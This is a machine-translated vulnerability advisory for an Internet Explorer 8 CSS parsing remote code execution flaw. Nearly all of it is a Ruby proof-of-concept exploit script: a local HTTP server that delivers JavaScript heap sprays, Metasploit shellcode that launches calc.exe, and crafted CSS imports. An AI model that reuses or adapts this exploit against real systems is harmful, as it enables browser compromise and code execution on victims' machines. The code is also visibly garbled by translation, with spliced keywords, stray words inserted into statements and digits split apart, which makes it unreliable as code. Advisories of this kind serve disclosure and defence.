Internet Explorer 8 CSS parsing vulnerability - vulnerability warning - the black bar safety net

2010-12-20T00:00:00
ID MYHACK58:62201028622
Type myhack58
Reporter 佚名
Modified 2010-12-20T00:00:00

Description

Internet Explorer 8 is a web browser released by Microsoft. Internet Explorer 8 contains a vulnerability in its CSS parsing that may lead to remote code execution. The vulnerability was originally reported on WooYun (http://www.wooyun.org/bugs/wooyun-2010-0885) and submitted to exploit-db as a denial-of-service vulnerability (http://www.exploit-db.com/exploits/15708/); a foreign researcher later analyzed it and published exploit code demonstrating that it is in fact a remote code execution vulnerability. The detailed analysis and the exploit code can be found at http://www.breakingpointsystems.com/community/blog/ie-vulnerability/, in the article titled "When A DoS Isn't A DoS".

[+]info: ~~~~~~~~~ Internet Explorer 8 CSS Parser Exploit

[+]poc: ~~~~~~~~~



| 0 0 1 | #!/ usr/bin/env ruby ---|---

0 0 2 | ---|---

0 0 3 | # Source: <http://www.breakingpointsystems.com/community/blog/ie-vulnerability/> ---|---

0 0 4 | # Author: Nephi Johnson (d0c_s4vage) ---|---

0 0 5 | ---|---

0 0 6 | require'socket" ---|---

0 0 7 | ---|---

0 0 8 | def http_send(sock, data, opts={}) ---|---

0 0 9 | defaults = {:code=>"2 0 0", :message=>"OK", :type=>"text/html"} ` ---|---

0 1 0 | opts = defaults. merge(opts) ` ---|---

0 1 1 | ---|---

0 1 2 | code = opts[:code] ` ---|---

0 1 3 | message = opts[:message] ` ---|---

0 1 4 | type = opts[:type] ` ---|---

0 1 5 | ---|---

0 1 6 | to_send = "HTTP/1.1 #{code} #{message}\r\n" + ---|---

0 1 7 | "Date: Mon, 1 1 Dec 2 0 1 0 1 4:2 0:2 3 GMT\r\n"+ ` ---|---

0 1 8 | "Cache-Control: no-cache\r\n"+ ` ---|---

0 1 9 | "Content-Type: #{type}\r\n"+ ` ---|---

0 2 0 | "Pragma: no-cache\r\n"+ ` ---|---

0 2 1 | "Content-Length: #{data. length}\r\n\r\n"+ ` ---|---

0 2 2 | "#{data}"` ---|---

0 2 3 | puts "[+] Sending:" ---|---

0 2 4 | to_send. split("\n").each do |line| ---|---

0 2 5 | puts " #{line}" ---|---

0 2 6 | end` ---|---

0 2 7 | sock. write(to_send) rescue return false ---|---

0 2 8 | returntrue` ---|---

0 2 9 | end ---|---

0 3 0 | ---|---

0 3 1 | def sock_read(sock, out_str, timeout=5) ---|---

0 3 2 | begin` ---|---

0 3 3 | ifKernel. select([sock],[],[],timeout) ` ---|---

0 3 4 | out_str. replace(sock. recv(1 0 2 4)) ` ---|---

0 3 5 | puts "[+] Received:" ---|---

0 3 6 | out_str. split("\n").each do |line| ---|---

0 3 7 | puts " #{line}" ---|---

0 3 8 | end` ---|---

0 3 9 | else` ---|---

0 4 0 | sock. close ` ---|---

0 4 1 | returnfalse` ---|---

0 4 2 | end` ---|---

0 4 3 | rescueException is=> ex ` ---|---

0 4 4 | returnfalse` ---|---

0 4 5 | end` ---|---

0 4 6 | end ---|---

0 4 7 | ---|---

0 4 8 | def to_uni(str) ---|---

0 4 9 | res = "" ---|---

0 5 0 | str. each_byte do in |b| ---|---

0 5 1 | res << "\x00#{b. chr}" ---|---

0 5 2 | end` ---|---

0 5 3 | res ` ---|---

0 5 4 | end ---|---

0 5 5 | ---|---

0 5 6 | @css_name ="\x00s\x03s\x00s\x03s\x00s\x03s\x00s\x03s"` ---|---

0 5 7 | @html_name ="test.html"` ---|---

0 5 8 | placeholder ="a"* (@css_name. length/2) ` ---|---

0 5 9 | ---|---

0 6 0 | @html = &lt;&lt;-HTML` ---|---

0 6 1 | <script> ` ---|---

0 6 2 | function dup_str(str, length) { ` ---|---

0 6 3 | var res = str; ` ---|---

0 6 4 | while(res. length &lt; length) { ---|---

0 6 5 | res += res; ` ---|---

0 6 6 | } ` ---|---

0 6 7 | res = res. substr(res. length - length); ` ---|---

0 6 8 | returnres; ` ---|---

0 6 9 | } ` ---|---

0 7 0 | ---|---

0 7 1 | function to_bin(str) { ` ---|---

0 7 2 | var res = ""; ` ---|---

0 7 3 | while(str. length &gt;0) { ---|---

0 7 4 | var first = str. substr(0``,2); ---|---

0 7 5 | var second = str. substr(2, 2); ` ---|---

0 7 6 | res += "%u" + second + first; ---|---

0 7 7 | str = (str. length > 4) ? str. substr(4) : ""; ` ---|---

0 7 8 | } ` ---|---

0 7 9 | returnunescape(res); ` ---|---

0 8 0 | } ` ---|---

0 8 1 | ---|---

0 8 2 | // first heap spray ` ---|---

0 8 3 | var base = dup_str(to_bin("0c0c0c0900000008000000730073030100000000010000730073030c"), 5 1 2+6); ` ---|---

0 8 4 | var arr = [] ` ---|---

0 8 5 | for(var i =0; i &lt;6 0 0 0 0; i++) { ---|---

0 8 6 | arr[i] = ["" + base]. join (""); ---|---

0 8 7 | } ` ---|---

0 8 8 | ---|---

0 8 9 | // second heap spray w/ shellcode ` ---|---

0 9 0 | var nops = dup_str(to_bin("0c0c0c0c"), 4 0 9 6+6); ` ---|---

0 9 1 | ---|---

0 9 2 | // windows/exec - 2 0 0 bytes ---|---

0 9 3 | // http://www.metasploit.com ` ---|---

0 9 4 | // EXITFUNC=process, CMD=calc.exe ` ---|---

0 9 5 | var shellcode = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30" + ---|---

0 9 6 | "%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031"+ ` ---|---

0 9 7 | "%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752"+ ` ---|---

0 9 8 | "%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a"+ ` ---|---

0 9 9 | "%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34"+ ` ---|---

1 0 0 | "%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475"+ ` ---|---

1 0 1 | "%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66"+ ` ---|---

1 0 2 | "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424"+ ` ---|---

1 0 3 | "%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86"+ ` ---|---

1 0 4 | "%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff"+ ` ---|---

1 0 5 | "%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c"+ ` ---|---

1 0 6 | "%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5"+ ` ---|---

1 0 7 | "%u6c61%u2e63%u7865%u0065"); ---|---

1 0 8 | var arr2 = []; ` ---|---

1 0 9 | for(var i =0; i &lt;3 0 0 0 0; i++) { ---|---

1 1 0 | arr2[i] = a [nops + shellcode]. join (""); ` ---|---

1 1 1 | } ` ---|---

1 1 2 | ---|---

1 1 3 | // write the link to the stylesheet ` ---|---

1 1 4 | var link = document. createElement("link"); ` ---|---

1 1 5 | link. setAttribute("rel", "Stylesheet"); ` ---|---

1 1 6 | link. setAttribute("type", "text/css"); ` ---|---

1 1 7 | link. setAttribute("href", "#{placeholder}") ` ---|---

1 1 8 | document. getElementsByTagName("head")[0]. appendChild(link); ` ---|---

1 1 9 | </script> ` ---|---

1 2 0 | HTML ---|---

1 2 1 | @html ="\xfe\xff"+ to_uni(@html) ` ---|---

1 2 2 | @html. gsub! (to_uni(placeholder), @css_name) ` ---|---

1 2 3 | ---|---

1 2 4 | @css = &lt;&lt;-CSS` ---|---

1 2 5 | @import and url("#{placeholder}"); ---|---

1 2 6 | @import and url("#{placeholder}"); ---|---

1 2 7 | @import and url("#{placeholder}"); ---|---

1 2 8 | @import and url("#{placeholder}"); ---|---

1 2 9 | CSS ---|---

1 3 0 | @css ="\xfe\xff"+ to_uni(@css) ` ---|---

1 3 1 | @css. gsub! (to_uni(placeholder), @css_name) ` ---|---

1 3 2 | ---|---

1 3 3 | @index = &lt;&lt;-INDEX` ---|---

1 3 4 | &lt;a href="#{@html_name}"&gt;#{@html_name}&lt;/a&gt; ---|---

1 3 5 | INDEX ---|---

1 3 6 | ---|---

1 3 7 | TCPServer. open(5 5 5 5 5)do|srv| ` ---|---

1 3 8 | whiletrue` ---|---

1 3 9 | cli = srv. accept ---|---1 4 0| req =""` ---|---

1 4 1 | html = "" ---|---

1 4 2 | css = "" ---|---

1 4 3 | index = "" ---|---

1 4 4 | nextunlesssock_read(cli, req, 5) ` ---|---

1 4 5 | whilereq. length > 0 ---|---

1 4 6 | ifreq =~ /GET/ ` ---|---

1 4 7 | ifreq =~ /GET.*# {The Regexp. escape(@html_name)}/ ---|---

1 4 8 | breakunlesshttp_send(cli, @html, :type=>"text/html") ` ---|---

1 4 9 | elsifreq =~ /GET.* index/ ` ---|---

1 5 0 | breakunlesshttp_send(cli, @index) ` ---|---

1 5 1 | elsifreq =~ /GET.*# {The Regexp. escape(@css_name)}/ ---|---

1 5 2 | breakunlesshttp_send(cli, @css, :type=>"text/css") ` ---|---

1 5 3 | else` ---|---

1 5 4 | breakunlesshttp_send(cli, @css, :type=>"text/css") ` ---|---

1 5 5 | end` ---|---

1 5 6 | elsifreq =~ /QUIT/ ` ---|---

1 5 7 | exit() ` ---|---

1 5 8 | end` ---|---

1 5 9 | req = "" ---|---

1 6 0 | nextunlesssock_read(cli, req, 5) ` ---|---

1 6 1 | end` ---|---

1 6 2 | cli. close the rescue next ---|---

1 6 3 | end` ---|---

1 6 4 | end ---|---

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/15746